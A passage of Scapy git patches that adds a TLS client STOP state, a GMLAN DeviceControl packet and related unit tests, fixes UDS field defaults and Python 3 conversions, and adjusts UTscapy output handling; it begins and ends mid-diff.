b/test/scapy/layers/dhcp.uts index d20a2b03517..c04c78d84a8 100644 --- a/test/scapy/layers/dhcp.uts +++ b/test/scapy/layers/dhcp.uts @@ -11,8 +11,8 @@ assert BOOTP().hashret() == b"\x00\x00\x00\x00" import random random.seed(0x2809) o = str(RandDHCPOptions(size=1)) -print("RandDHCPOptions %s" % o) -assert o in [r"[('NIS_server', '0.45.231.69')]", r"[('tcp_keepalive_interval', 3853054080)]"] +# print("RandDHCPOptions %s" % o) +assert o in [r"[('NIS_server', '0.45.231.69')]", r"[('tcp_keepalive_interval', 3853054080)]", r"[('tcp_keepalive_interval', 3853054080L)]"] = DHCPOptionsField From b140d07b0c1680b108fc79ea5c1a534c4c01c95d Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Fri, 11 Dec 2020 14:47:43 +0100 Subject: [PATCH 0458/1632] TLS client: support STOP event --- scapy/automaton.py | 6 ++++++ scapy/layers/tls/automaton_cli.py | 13 ++++++++----- 2 files changed, 14 insertions(+), 5 deletions(-) diff --git a/scapy/automaton.py b/scapy/automaton.py index 69751a0db9b..cc06e4d0d2d 100644 --- a/scapy/automaton.py +++ b/scapy/automaton.py @@ -987,6 +987,12 @@ def _do_iter(self): self.state = state_req yield state_req + def __repr__(self): + return "" % ( + self.__class__.__name__, + ["HALTED", "RUNNING"][self.started.locked()] + ) + # Public API def add_interception_points(self, *ipts): for ipt in ipts: diff --git a/scapy/layers/tls/automaton_cli.py b/scapy/layers/tls/automaton_cli.py index df22151a3ba..976538c2182 100644 --- a/scapy/layers/tls/automaton_cli.py +++ b/scapy/layers/tls/automaton_cli.py @@ -33,11 +33,6 @@ a = TLSClientAutomaton.tlslink(HTTP, server="www.google.com", dport=443) pkt = a.sr1(HTTP()/HTTPRequest(), session=TCPSession(app=True), timeout=2) - -TODO: - - Add an event with `stop=1` (called on atmt.stop()) that correctly calls - one of the `CLOSE_NOTIFY` events depending on the SSL/TLS version. - """ from __future__ import print_function @@ -1402,6 +1397,14 @@ def TLS13_SENT_CLIENTFLIGHT2(self): def SOCKET_CLOSED(self): raise self.FINAL() + @ATMT.state(stop=True) + def STOP(self): + # Called on atmt.stop() + if self.cur_session.advertised_tls_version in [0x0200, 0x0002]: + raise self.SSLv2_CLOSE_NOTIFY() + else: + raise self.CLOSE_NOTIFY() + @ATMT.state(final=True) def FINAL(self): # We might call shutdown, but it may happen that the server From a1b209889292e433f5d3c3c24d9bcbbd237280fe Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sat, 24 Oct 2020 18:30:53 +0200 Subject: [PATCH 0459/1632] Use plain_str capabilities PY3.5+ On python 2.7 or python 3.5+ (all except <3.5), plain_str uses the backslashreplace option which allows to remove these parts, which were especially ugly... --- scapy/fields.py | 7 +++---- scapy/layers/dot11.py | 6 ++---- test/scapy/layers/dot11.uts | 11 +++-------- test/tftp.uts | 6 ++++-- 4 files changed, 12 insertions(+), 18 deletions(-) diff --git a/scapy/fields.py b/scapy/fields.py index 174c9b88f53..63331682404 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -1325,10 +1325,9 @@ def any2i(self, pkt, x): def i2repr(self, pkt, x): # type: (Optional[Packet], I) -> str - val = super(_StrField, self).i2repr(pkt, x) - if val[:2] in ['b"', "b'"]: - return val[1:] - return val + if isinstance(x, bytes): + return repr(plain_str(x)) + return super(_StrField, self).i2repr(pkt, x) def i2m(self, pkt, x): # type: (Optional[Packet], Optional[I]) -> bytes diff --git a/scapy/layers/dot11.py b/scapy/layers/dot11.py index 11dd45e483c..de35c19c212 100644 --- a/scapy/layers/dot11.py +++ b/scapy/layers/dot11.py @@ -1019,10 +1019,8 @@ def __setattr__(self, attr, val): def mysummary(self): if self.ID == 0: - ssid = repr(self.info) - if ssid[:2] in ['b"', "b'"]: - ssid = ssid[1:] - return "SSID=%s" % ssid, [Dot11] + ssid = plain_str(self.info) + return "SSID='%s'" % ssid, [Dot11] else: return "" diff --git a/test/scapy/layers/dot11.uts b/test/scapy/layers/dot11.uts index 631f57469cb..7f822280725 100644 --- a/test/scapy/layers/dot11.uts +++ b/test/scapy/layers/dot11.uts @@ -37,17 +37,12 @@ assert s == b'\x88\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x pkt = Dot11() / Dot11Beacon() / Dot11Elt(ID=0, info=b"".join(chb(i) for i in range(32))) pkt.show() pkt.summary() -assert pkt[Dot11Elt::{"ID": 0}].summary() in [ - "SSID='%s'" % "".join(repr(chr(d))[1:-1] for d in range(32)), - 'SSID="%s"' % "".join(repr(chr(d))[1:-1] for d in range(32)), -] +assert pkt[Dot11Elt::{"ID": 0}].summary() == "SSID='%s'" % "".join(chr(d) for d in range(32)) + pkt = Dot11(raw(pkt)) pkt.show() pkt.summary() -assert pkt[Dot11Elt::{"ID": 0}].summary() in [ - "SSID='%s'" % "".join(repr(chr(d))[1:-1] for d in range(32)), - 'SSID="%s"' % "".join(repr(chr(d))[1:-1] for d in range(32)), -] +assert pkt[Dot11Elt::{"ID": 0}].summary() == "SSID='%s'" % "".join(chr(d) for d in range(32)) = Dot11QoS - dissection p = Dot11(s) diff --git a/test/tftp.uts b/test/tftp.uts index 7aa4fc6e1cb..b8968457767 100644 --- a/test/tftp.uts +++ b/test/tftp.uts @@ -78,7 +78,8 @@ try: tftp_read.run() assert False except Automaton.ErrorState as e: - assert str(e) == "Reached ERROR: [\"ERROR Access violation: 'Fatal error'\"]" + assert "Reached ERROR" in str(e) + assert "ERROR Access violation" in str(e) scapy.automaton.select_objects = legacy_select_objects @@ -119,7 +120,8 @@ try: tftp_write.run() assert False except Automaton.ErrorState as e: - assert str(e) == "Reached ERROR: [\"ERROR Access violation: 'Fatal error'\"]" + assert "Reached ERROR" in str(e) + assert "ERROR Access violation" in str(e) scapy.automaton.select_objects = legacy_select_objects From 3f573f14385105763774a22b92cae7ae99160fee Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sat, 24 Oct 2020 18:44:15 +0200 Subject: [PATCH 0460/1632] Improve OPENBSD DLT_RAW/IP fix --- scapy/data.py | 8 ++++++-- scapy/utils.py | 7 +------ 2 files changed, 7 insertions(+), 8 deletions(-) diff --git a/scapy/data.py b/scapy/data.py index 2cad3259d3d..1a150a26a7c 100644 --- a/scapy/data.py +++ b/scapy/data.py @@ -118,8 +118,12 @@ DLT_PPP_WITH_DIR = 204 DLT_FC_2 = 224 DLT_CAN_SOCKETCAN = 227 -DLT_IPV4 = 228 -DLT_IPV6 = 229 +if OPENBSD: + DLT_IPV4 = DLT_RAW + DLT_IPV6 = DLT_RAW +else: + DLT_IPV4 = 228 + DLT_IPV6 = 229 DLT_IEEE802_15_4_NOFCS = 230 DLT_USBPCAP = 249 DLT_NETLINK = 253 diff --git a/scapy/utils.py b/scapy/utils.py index 9a143dca4d3..82a3c672162 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -32,7 +32,7 @@ from scapy.modules.six.moves import range, input, zip_longest from scapy.config import conf -from scapy.consts import DARWIN, WINDOWS, WINDOWS_XP, OPENBSD +from scapy.consts import DARWIN, WINDOWS, WINDOWS_XP from scapy.data import MTU, DLT_EN10MB from scapy.compat import orb, plain_str, chb, bytes_base64,\ base64_bytes, hex_bytes, lambda_tuple_converter, bytes_encode @@ -1763,11 +1763,6 @@ def write_header(self, pkt): self.linktype = conf.l2types.layer2num[ pkt.__class__ ] - # Import here to prevent import loops - from scapy.layers.inet import IP - from scapy.layers.inet6 import IPv6 - if OPENBSD and isinstance(pkt, (IP, IPv6)): - self.linktype = 14 # DLT_RAW except KeyError: warning("PcapWriter: unknown LL type for %s. Using type 1 (Ethernet)", pkt.__class__.__name__) # noqa: E501 self.linktype = DLT_EN10MB From 72c99eaca01e04fab12d5f93e5b601962bfa89ee Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Sun, 27 Dec 2020 17:27:31 +0100 Subject: [PATCH 0461/1632] Catch exceptions in CAN signal packets --- scapy/layers/can.py | 14 +++++++++++--- 1 file changed, 11 insertions(+), 3 deletions(-) diff --git a/scapy/layers/can.py b/scapy/layers/can.py index ff0fbb17a31..4ff47e1617a 100644 --- a/scapy/layers/can.py +++ b/scapy/layers/can.py @@ -132,13 +132,21 @@ def __init__(self, name, default, start, size, scaling=1, unit="", @staticmethod def _msb_lookup(start): # type: (int) -> int - return SignalField._lookup_table.index(start) + try: + return SignalField._lookup_table.index(start) + except ValueError: + raise Scapy_Exception("Only 64 bits for all SignalFields " + "are supported") @staticmethod def _lsb_lookup(start, size): # type: (int, int) -> int - return SignalField._lookup_table[SignalField._msb_lookup(start) + - size - 1] + try: + return SignalField._lookup_table[SignalField._msb_lookup(start) + + size - 1] + except IndexError: + raise Scapy_Exception("Only 64 bits for all SignalFields " + "are supported") @staticmethod def _convert_to_unsigned(number, bit_length): From dbc853b098aa312c49a2ed3549dc496ca8e04ac4 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Sun, 27 Dec 2020 17:57:52 +0100 Subject: [PATCH 0462/1632] Fix default values in UDS --- scapy/contrib/automotive/uds.py | 73 ++++++++++++++++++--------------- 1 file changed, 39 insertions(+), 34 deletions(-) diff --git a/scapy/contrib/automotive/uds.py b/scapy/contrib/automotive/uds.py index 5d23928660a..19b72c43d76 100644 --- a/scapy/contrib/automotive/uds.py +++ b/scapy/contrib/automotive/uds.py @@ -20,6 +20,7 @@ from scapy.error import log_loading from scapy.utils import PeriodicSenderThread from scapy.contrib.isotp import ISOTP +from scapy.compat import Dict, Union, Tuple, Any """ UDS @@ -91,13 +92,14 @@ class UDS(ISOTP): 0xC5: 'ControlDTCSettingPositiveResponse', 0xC6: 'ResponseOnEventPositiveResponse', 0xC7: 'LinkControlPositiveResponse', - 0x7f: 'NegativeResponse'}) + 0x7f: 'NegativeResponse'}) # type: Dict[int, str] name = 'UDS' fields_desc = [ XByteEnumField('service', 0, services) ] def answers(self, other): + # type: (Union[UDS, Packet]) -> bool if other.__class__ != self.__class__: return False if self.service == 0x7f: @@ -111,6 +113,7 @@ def answers(self, other): return False def hashret(self): + # type: () -> bytes if self.service == 0x7f: return struct.pack('B', self.requestServiceId) return struct.pack('B', self.service & ~0x40) @@ -132,6 +135,7 @@ class UDS_DSC(Packet): @staticmethod def get_log(pkt): + # type: (UDS_DSC) -> Tuple[str, Any] return pkt.sprintf("%UDS.service%"), \ pkt.sprintf("%UDS_DSC.diagnosticSessionType%") @@ -144,7 +148,7 @@ class UDS_DSCPR(Packet): fields_desc = [ ByteEnumField('diagnosticSessionType', 0, UDS_DSC.diagnosticSessionTypes), - StrField('sessionParameterRecord', B"") + StrField('sessionParameterRecord', b"") ] def answers(self, other): @@ -173,6 +177,7 @@ class UDS_ER(Packet): 0x03: 'softReset', 0x04: 'enableRapidPowerShutDown', 0x05: 'disableRapidPowerShutDown', + 0x41: 'powerDown', 0x7F: 'ISOSAEReserved'} name = 'ECUReset' fields_desc = [ @@ -217,9 +222,9 @@ class UDS_SA(Packet): name = 'SecurityAccess' fields_desc = [ ByteField('securityAccessType', 0), - ConditionalField(StrField('securityAccessDataRecord', B""), + ConditionalField(StrField('securityAccessDataRecord', b""), lambda pkt: pkt.securityAccessType % 2 == 1), - ConditionalField(StrField('securityKey', B""), + ConditionalField(StrField('securityKey', b""), lambda pkt: pkt.securityAccessType % 2 == 0) ] @@ -240,7 +245,7 @@ class UDS_SAPR(Packet): name = 'SecurityAccessPositiveResponse' fields_desc = [ ByteField('securityAccessType', 0), - ConditionalField(StrField('securitySeed', B""), + ConditionalField(StrField('securitySeed', b""), lambda pkt: pkt.securityAccessType % 2 == 1), ] @@ -380,7 +385,7 @@ class UDS_ATP(Packet): fields_desc = [ ByteEnumField('timingParameterAccessType', 0, timingParameterAccessTypes), - ConditionalField(StrField('timingParameterRequestRecord', B""), + ConditionalField(StrField('timingParameterRequestRecord', b""), lambda pkt: pkt.timingParameterAccessType == 0x4) ] @@ -393,7 +398,7 @@ class UDS_ATPPR(Packet): fields_desc = [ ByteEnumField('timingParameterAccessType', 0, UDS_ATP.timingParameterAccessTypes), - ConditionalField(StrField('timingParameterResponseRecord', B""), + ConditionalField(StrField('timingParameterResponseRecord', b""), lambda pkt: pkt.timingParameterAccessType == 0x3) ] @@ -410,7 +415,7 @@ def answers(self, other): class UDS_SDT(Packet): name = 'SecuredDataTransmission' fields_desc = [ - StrField('securityDataRequestRecord', B"") + StrField('securityDataRequestRecord', b"") ] @staticmethod @@ -424,7 +429,7 @@ def get_log(pkt): class UDS_SDTPR(Packet): name = 'SecuredDataTransmissionPositiveResponse' fields_desc = [ - StrField('securityDataResponseRecord', B"") + StrField('securityDataResponseRecord', b"") ] def answers(self, other): @@ -448,7 +453,7 @@ class UDS_CDTCS(Packet): name = 'ControlDTCSetting' fields_desc = [ ByteEnumField('DTCSettingType', 0, DTCSettingTypes), - StrField('DTCSettingControlOptionRecord', B"") + StrField('DTCSettingControlOptionRecord', b"") ] @staticmethod @@ -489,7 +494,7 @@ class UDS_ROE(Packet): fields_desc = [ ByteEnumField('eventType', 0, eventTypes), ByteField('eventWindowTime', 0), - StrField('eventTypeRecord', B"") + StrField('eventTypeRecord', b"") ] @@ -502,7 +507,7 @@ class UDS_ROEPR(Packet): ByteEnumField('eventType', 0, UDS_ROE.eventTypes), ByteField('numberOfIdentifiedEvents', 0), ByteField('eventWindowTime', 0), - StrField('eventTypeRecord', B"") + StrField('eventTypeRecord', b"") ] def answers(self, other): @@ -567,7 +572,7 @@ class UDS_RDBI(Packet): dataIdentifiers = ObservableDict() name = 'ReadDataByIdentifier' fields_desc = [ - FieldListField("identifiers", [0], + FieldListField("identifiers", None, XShortEnumField('dataIdentifier', 0, dataIdentifiers)) ] @@ -627,9 +632,9 @@ class UDS_RMBA(Packet): @staticmethod def get_log(pkt): - addr = getattr(pkt, "memoryAddress%d" % pkt.memoryAddressLen) - size = getattr(pkt, "memorySize%d" % pkt.memorySizeLen) - return pkt.sprintf("%UDS.service%"), (addr, size) + return pkt.sprintf("%UDS.service%"), \ + (getattr(pkt, "memoryAddress%d" % pkt.memoryAddressLen), + getattr(pkt, "memorySize%d" % pkt.memorySizeLen)) bind_layers(UDS, UDS_RMBA, service=0x23) @@ -638,7 +643,7 @@ def get_log(pkt): class UDS_RMBAPR(Packet): name = 'ReadMemoryByAddressPositiveResponse' fields_desc = [ - StrField('dataRecord', None, fmt="B") + StrField('dataRecord', b"", fmt="B") ] def answers(self, other): @@ -670,7 +675,7 @@ class UDS_RSDBIPR(Packet): fields_desc = [ XShortEnumField('dataIdentifier', 0, UDS_RSDBI.dataIdentifiers), ByteField('scalingByte', 0), - StrField('dataRecord', None, fmt="B") + StrField('dataRecord', b"", fmt="B") ] def answers(self, other): @@ -694,7 +699,7 @@ class UDS_RDBPI(Packet): fields_desc = [ ByteEnumField('transmissionMode', 0, transmissionModes), ByteField('periodicDataIdentifier', 0), - StrField('furtherPeriodicDataIdentifier', 0, fmt="B") + StrField('furtherPeriodicDataIdentifier', b"", fmt="B") ] @@ -706,7 +711,7 @@ class UDS_RDBPIPR(Packet): name = 'ReadDataByPeriodicIdentifierPositiveResponse' fields_desc = [ ByteField('periodicDataIdentifier', 0), - StrField('dataRecord', None, fmt="B") + StrField('dataRecord', b"", fmt="B") ] def answers(self, other): @@ -727,7 +732,7 @@ class UDS_DDDI(Packet): 0x3: "clearDynamicallyDefinedDataIdentifier"} fields_desc = [ ByteEnumField('subFunction', 0, subFunctions), - StrField('dataRecord', 0, fmt="B") + StrField('dataRecord', b"", fmt="B") ] @@ -808,7 +813,7 @@ class UDS_WMBA(Packet): lambda pkt: pkt.memorySizeLen == 3), ConditionalField(XIntField('memorySize4', 0), lambda pkt: pkt.memorySizeLen == 4), - StrField('dataRecord', b'\x00', fmt="B"), + StrField('dataRecord', b'', fmt="B"), ] @@ -970,11 +975,11 @@ class UDS_RDTCIPR(Packet): ConditionalField(ShortField('DTCCount', 0), lambda pkt: pkt.reportType in [0x01, 0x07, 0x11, 0x12]), - ConditionalField(StrField('DTCAndStatusRecord', 0), + ConditionalField(StrField('DTCAndStatusRecord', b""), lambda pkt: pkt.reportType in [0x02, 0x0A, 0x0B, 0x0C, 0x0D, 0x0E, 0x0F, 0x13, 0x15]), - ConditionalField(StrField('dataRecord', 0), + ConditionalField(StrField('dataRecord', b""), lambda pkt: pkt.reportType in [0x03, 0x04, 0x05, 0x06, 0x08, 0x09, 0x10, 0x14]) @@ -1005,7 +1010,7 @@ class UDS_RC(Packet): fields_desc = [ ByteEnumField('routineControlType', 0, routineControlTypes), XShortEnumField('routineIdentifier', 0, routineControlIdentifiers), - StrField('routineControlOptionRecord', 0, fmt="B"), + StrField('routineControlOptionRecord', b"", fmt="B"), ] @staticmethod @@ -1026,7 +1031,7 @@ class UDS_RCPR(Packet): UDS_RC.routineControlTypes), XShortEnumField('routineIdentifier', 0, UDS_RC.routineControlIdentifiers), - StrField('routineStatusRecord', 0, fmt="B"), + StrField('routineStatusRecord', b"", fmt="B"), ] def answers(self, other): @@ -1087,7 +1092,7 @@ class UDS_RDPR(Packet): fields_desc = [ BitField('memorySizeLen', 0, 4), BitField('reserved', 0, 4), - StrField('maxNumberOfBlockLength', 0, fmt="B"), + StrField('maxNumberOfBlockLength', b"", fmt="B"), ] def answers(self, other): @@ -1142,7 +1147,7 @@ class UDS_RUPR(Packet): fields_desc = [ BitField('memorySizeLen', 0, 4), BitField('reserved', 0, 4), - StrField('maxNumberOfBlockLength', 0, fmt="B"), + StrField('maxNumberOfBlockLength', b"", fmt="B"), ] def answers(self, other): @@ -1161,7 +1166,7 @@ class UDS_TD(Packet): name = 'TransferData' fields_desc = [ ByteField('blockSequenceCounter', 0), - StrField('transferRequestParameterRecord', 0, fmt="B") + StrField('transferRequestParameterRecord', b"", fmt="B") ] @staticmethod @@ -1177,7 +1182,7 @@ class UDS_TDPR(Packet): name = 'TransferDataPositiveResponse' fields_desc = [ ByteField('blockSequenceCounter', 0), - StrField('transferResponseParameterRecord', 0, fmt="B") + StrField('transferResponseParameterRecord', b"", fmt="B") ] def answers(self, other): @@ -1196,7 +1201,7 @@ def get_log(pkt): class UDS_RTE(Packet): name = 'RequestTransferExit' fields_desc = [ - StrField('transferRequestParameterRecord', 0, fmt="B") + StrField('transferRequestParameterRecord', b"", fmt="B") ] @staticmethod @@ -1211,7 +1216,7 @@ def get_log(pkt): class UDS_RTEPR(Packet): name = 'RequestTransferExitPositiveResponse' fields_desc = [ - StrField('transferResponseParameterRecord', 0, fmt="B") + StrField('transferResponseParameterRecord', b"", fmt="B") ] def answers(self, other): @@ -1328,7 +1333,7 @@ class UDS_IOCBI(Packet): fields_desc = [ XShortEnumField('dataIdentifier', 0, dataIdentifiers), ByteField('controlOptionRecord', 0), - StrField('controlEnableMaskRecord', 0, fmt="B") + StrField('controlEnableMaskRecord', b"", fmt="B") ] @staticmethod @@ -1343,7 +1348,7 @@ class UDS_IOCBIPR(Packet): name = 'InputOutputControlByIdentifierPositiveResponse' fields_desc = [ XShortField('dataIdentifier', 0), - StrField('controlStatusRecord', 0, fmt="B") + StrField('controlStatusRecord', b"", fmt="B") ] def answers(self, other): From 89105fdedf07d69b5ffe944ba10ea19f5105ba2a Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Sat, 19 Dec 2020 17:04:50 +0100 Subject: [PATCH 0463/1632] Missing Python3 compatible conversion --- scapy/contrib/icmp_extensions.py | 3 ++- test/contrib/icmp_extensions.uts | 7 +++++++ 2 files changed, 9 insertions(+), 1 deletion(-) create mode 100644 test/contrib/icmp_extensions.uts diff --git a/scapy/contrib/icmp_extensions.py b/scapy/contrib/icmp_extensions.py index a0e5e96f7bb..c2b802e965d 100644 --- a/scapy/contrib/icmp_extensions.py +++ b/scapy/contrib/icmp_extensions.py @@ -19,6 +19,7 @@ import struct import scapy +from scapy.compat import chb from scapy.packet import Packet, bind_layers from scapy.fields import BitField, ByteField, ConditionalField, \ FieldLenField, IPField, IntField, PacketListField, ShortField, \ @@ -55,7 +56,7 @@ class ICMPExtensionHeader(Packet): def post_build(self, p, pay): if self.chksum is None: ck = checksum(p) - p = p[:2] + chr(ck >> 8) + chr(ck & 0xff) + p[4:] + p = p[:2] + chb(ck >> 8) + chb(ck & 0xff) + p[4:] return p + pay def guess_payload_class(self, payload): diff --git a/test/contrib/icmp_extensions.uts b/test/contrib/icmp_extensions.uts new file mode 100644 index 00000000000..e2228e767c6 --- /dev/null +++ b/test/contrib/icmp_extensions.uts @@ -0,0 +1,7 @@ ++ ICMP Extensions tests + += Basic build + +p = IP(dst="142.250.209.14")/ICMP()/ICMPExtensionHeader(version = 2)/ICMPExtensionMPLS(classnum = 1, classtype = 1) +b = b'E\x00\x00$\x00\x01\x00\x00@\x01/\xfc\xc0\xa8*+\x8e\xfa\xd1\x0e\x08\x00\xf6\xfa\x00\x00\x00\x00 \x00\xdf\xff\x00\x04\x01\x01' +assert raw(p) == b From f10e7aeef83213f723b6e43d394c4879b8087dc4 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Sun, 27 Dec 2020 18:10:21 +0100 Subject: [PATCH 0464/1632] Add DeviceControl packet to GMLAN --- scapy/contrib/automotive/gm/gmlan.py | 44 ++++++++++++++++++++++++---- 1 file changed, 38 insertions(+), 6 deletions(-) diff --git a/scapy/contrib/automotive/gm/gmlan.py b/scapy/contrib/automotive/gm/gmlan.py index c92cb66e844..aa250701f77 100644 --- a/scapy/contrib/automotive/gm/gmlan.py +++ b/scapy/contrib/automotive/gm/gmlan.py @@ -11,7 +11,7 @@ from scapy.fields import ObservableDict, XByteEnumField, ByteEnumField, \ ConditionalField, XByteField, StrField, XShortEnumField, XShortField, \ X3BytesField, XIntField, ShortField, PacketField, PacketListField, \ - FieldListField, MultipleTypeField + FieldListField, MultipleTypeField, StrFixedLenField from scapy.packet import Packet, bind_layers, NoPayload from scapy.config import conf from scapy.error import warning, log_loading @@ -455,7 +455,7 @@ class GMLAN_RMBAPR(Packet): lambda pkt: GMLAN.determine_len(4)) ], XIntField('memoryAddress', 0)), - StrField('dataRecord', None, fmt="B") + StrField('dataRecord', b"", fmt="B") ] def answers(self, other): @@ -491,7 +491,7 @@ class GMLAN_SA(Packet): name = 'SecurityAccess' fields_desc = [ ByteEnumField('subfunction', 0, subfunctions), - ConditionalField(XShortField('securityKey', B""), + ConditionalField(XShortField('securityKey', 0), lambda pkt: pkt.subfunction % 2 == 0) ] @@ -512,7 +512,7 @@ class GMLAN_SAPR(Packet): name = 'SecurityAccessPositiveResponse' fields_desc = [ ByteEnumField('subfunction', 0, GMLAN_SA.subfunctions), - ConditionalField(XShortField('securitySeed', B""), + ConditionalField(XShortField('securitySeed', 0), lambda pkt: pkt.subfunction % 2 == 1), ] @@ -664,7 +664,7 @@ class GMLAN_TD(Packet): lambda pkt: GMLAN.determine_len(4)) ], XIntField('startingAddress', 0)), - StrField("dataRecord", None) + StrField("dataRecord", b"") ] @staticmethod @@ -682,7 +682,7 @@ class GMLAN_WDBI(Packet): name = 'WriteDataByIdentifier' fields_desc = [ XByteEnumField('dataIdentifier', 0, GMLAN_RDBI.dataIdentifiers), - StrField("dataRecord", b'\x00') + StrField("dataRecord", b'') ] @staticmethod @@ -816,6 +816,38 @@ class GMLAN_RDI_BC(Packet): # TODO:This function receive single frame responses... (Implement GMLAN Socket) +# ########################DC################################### +class GMLAN_DC(Packet): + name = 'DeviceControl' + fields_desc = [ + XByteField('CPIDNumber', 0), + StrFixedLenField('CPIDControlBytes', b"", 5) + ] + + @staticmethod + def get_log(pkt): + return pkt.sprintf("%GMLAN.service%"), \ + pkt.sprintf("%GMLAN_DC.CPIDNumber%") + + +bind_layers(GMLAN, GMLAN_DC, service=0xAE) + + +class GMLAN_DCPR(Packet): + name = 'DeviceControlPositiveResponse' + fields_desc = [ + XByteField('CPIDNumber', 0) + ] + + @staticmethod + def get_log(pkt): + return pkt.sprintf("%GMLAN.service%"), \ + pkt.sprintf("%GMLAN_DCPR.CPIDNumber%") + + +bind_layers(GMLAN, GMLAN_DCPR, service=0xEE) + + # ########################NRC################################### class GMLAN_NR(Packet): negativeResponseCodes = { From 6f0958eac1574e66662a9f8cbc97219a8bd676f8 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Mon, 4 Jan 2021 09:44:14 +0100 Subject: [PATCH 0465/1632] add unit tests --- scapy/contrib/automotive/gm/gmlan.py | 4 ++++ test/contrib/automotive/gm/gmlan.uts | 26 ++++++++++++++++++++++++++ 2 files changed, 30 insertions(+) diff --git a/scapy/contrib/automotive/gm/gmlan.py b/scapy/contrib/automotive/gm/gmlan.py index aa250701f77..cd8eb516516 100644 --- a/scapy/contrib/automotive/gm/gmlan.py +++ b/scapy/contrib/automotive/gm/gmlan.py @@ -844,6 +844,10 @@ def get_log(pkt): return pkt.sprintf("%GMLAN.service%"), \ pkt.sprintf("%GMLAN_DCPR.CPIDNumber%") + def answers(self, other): + return other.__class__ == GMLAN_DC \ + and other.CPIDNumber == self.CPIDNumber + bind_layers(GMLAN, GMLAN_DCPR, service=0xEE) diff --git a/test/contrib/automotive/gm/gmlan.uts b/test/contrib/automotive/gm/gmlan.uts index 3f6140efdc5..34710b3a517 100644 --- a/test/contrib/automotive/gm/gmlan.uts +++ b/test/contrib/automotive/gm/gmlan.uts @@ -449,5 +449,31 @@ ecu.update(GMLAN(service="ReturnToNormalOperationPositiveResponse")) assert ecu.current_session == 1 assert ecu.communication_control == 0 += Craft GMLAN_DC +req = GMLAN()/GMLAN_DC(CPIDNumber=0x11, CPIDControlBytes=b"\xbe\xefabc") +assert bytes(req) == b"\xAE\x11\xbe\xefabc" + +req2 = GMLAN()/GMLAN_DC(CPIDNumber=0x12) +assert bytes(req2) == b"\xAE\x12\x00\x00\x00\x00\x00" + +resp = GMLAN()/GMLAN_DCPR(CPIDNumber=0x11) +assert bytes(resp) == b"\xEE\x11" + + +assert resp.answers(req) +assert not resp.answers(req2) + += Dissect test GMLAN_DC + +req = GMLAN(b"\xAE\x14caffe") +assert req.service == 0xAE +assert req.CPIDNumber == 20 +assert req.CPIDControlBytes == b"caffe" + +resp = GMLAN(b"\xEE\x14") +assert resp.service == 0xEE +assert resp.CPIDNumber == 20 +assert resp.answers(req) +assert resp.hashret() == req.hashret() From dae2db99b56d77751c87c564a92bda92dc9a9b86 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Mon, 4 Jan 2021 10:18:11 +0100 Subject: [PATCH 0466/1632] Specify the source IP address --- test/contrib/icmp_extensions.uts | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/test/contrib/icmp_extensions.uts b/test/contrib/icmp_extensions.uts index e2228e767c6..13bdaf4482f 100644 --- a/test/contrib/icmp_extensions.uts +++ b/test/contrib/icmp_extensions.uts @@ -2,6 +2,7 @@ = Basic build -p = IP(dst="142.250.209.14")/ICMP()/ICMPExtensionHeader(version = 2)/ICMPExtensionMPLS(classnum = 1, classtype = 1) -b = b'E\x00\x00$\x00\x01\x00\x00@\x01/\xfc\xc0\xa8*+\x8e\xfa\xd1\x0e\x08\x00\xf6\xfa\x00\x00\x00\x00 \x00\xdf\xff\x00\x04\x01\x01' +p = IP(src="192.0.2.1", dst="192.0.2.2")/ICMP()/ICMPExtensionHeader(version = 2)/ICMPExtensionMPLS(classnum = 1, classtype = 1) +print(raw(p)) +b = b'E\x00\x00$\x00\x01\x00\x00@\x01\xf6\xd4\xc0\x00\x02\x01\xc0\x00\x02\x02\x08\x00\xf6\xfa\x00\x00\x00\x00 \x00\xdf\xff\x00\x04\x01\x01' assert raw(p) == b From 0c6e6aff6cdf4a8ed3674f07a8c664e01d7985d6 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Tue, 5 Jan 2021 01:12:59 +0100 Subject: [PATCH 0467/1632] Fix UTscapy logs sync --- scapy/tools/UTscapy.py | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/scapy/tools/UTscapy.py b/scapy/tools/UTscapy.py index e95321ab264..5e012ba443b 100644 --- a/scapy/tools/UTscapy.py +++ b/scapy/tools/UTscapy.py @@ -335,7 +335,7 @@ def get_if_exist(key, default): docs=get_if_exist("docs", 0), preexec=get_if_exist("preexec", {}), global_preexec=get_if_exist("global_preexec", ""), - outfile=get_if_exist("outputfile", sys.stdout), + outfile=get_if_exist("outputfile", sys.stderr), local=get_if_exist("local", False), num=get_if_exist("num", None), modules=get_if_exist("modules", []), @@ -928,7 +928,7 @@ def main(): # Parse arguments FORMAT = Format.ANSI - OUTPUTFILE = sys.stdout + OUTPUTFILE = sys.stderr LOCAL = 0 NUM = None NON_ROOT = False @@ -1170,9 +1170,8 @@ def main(): # Write the final output # Note: on Python 2, we force-encode to ignore ascii errors # on Python 3, we need to detect the type of stream - if OUTPUTFILE == sys.stdout: - OUTPUTFILE.write(glob_output.encode("utf8", "ignore") - if 'b' in OUTPUTFILE.mode or six.PY2 else glob_output) + if OUTPUTFILE == sys.stderr: + print(glob_output, file=OUTPUTFILE) else: with open(OUTPUTFILE, "wb") as f: f.write(glob_output.encode("utf8", "ignore") From 76e5364c1809476248d1534f5ad032df486c3dec Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Tue, 5 Jan 2021 23:16:20 +0100 Subject: [PATCH 0468/1632] Use sys.stdout on UTscapy --- scapy/tools/UTscapy.py | 63 ++++++++++++++++++++---------------------- 1 file changed, 30 insertions(+), 33 deletions(-) diff --git a/scapy/tools/UTscapy.py b/scapy/tools/UTscapy.py index 5e012ba443b..225de07ef97 100644 --- a/scapy/tools/UTscapy.py +++ b/scapy/tools/UTscapy.py @@ -322,7 +322,7 @@ def parse_config_file(config_path, verb=3): with open(config_path) as 